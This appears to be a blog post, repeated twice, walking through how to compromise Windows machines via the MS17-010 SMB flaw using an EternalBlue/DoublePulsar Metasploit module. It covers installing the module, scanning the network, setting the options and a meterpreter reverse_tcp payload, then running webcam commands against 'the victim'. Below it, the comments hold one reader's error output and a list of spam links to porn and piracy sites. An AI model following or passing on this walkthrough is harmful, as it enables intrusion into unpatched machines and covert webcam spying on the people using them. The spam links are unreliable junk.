- Get link
- X
- Other Apps
Just wanna share it..
I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.
Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.
Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).
Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target use x64 so i'm using x64 payload too).
If everything sets, now run exploit.
Run some interesting command like webcam_list or webcam_snap
The victim desktop screenshot.
Tested on my local network, tool used Metasploit running in Kali Linux.
Thats it, happy hacking!
I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.
Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.
Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).
Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target use x64 so i'm using x64 payload too).
If everything sets, now run exploit.
Run some interesting command like webcam_list or webcam_snap
The victim desktop screenshot.
Tested on my local network, tool used Metasploit running in Kali Linux.
Thats it, happy hacking!
Comments
sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/
wine: cannot find L"C:\\windows\\system32\\Eternalblue-2.2.0.exe"
BOKEP INDO
BOKEP BARAT
BOKEP ASIA
BOKEP JEPANG
NONTON BOKEP
crystal bracelet for women online in pakistan
buy rectangle sunglasses at affordable price online in pakistan
Best Engineer Boots For Men Shopping Online In Pakistan
buy Best Mukluk Boots Shopping Online In Pakistan
21mph Semi
nonton film
film cinemaindo21
Zonafilm21
DownMovie21
Dunia21
film ganool21
bioskoponline21
download anime
kim21movie.wixsite.com/movies21
kimovies21.gitbook.io/kimovies21
Daftar movie terbaru
kimovies21.jimdosite.com/
routinehub.co/user/kimovies21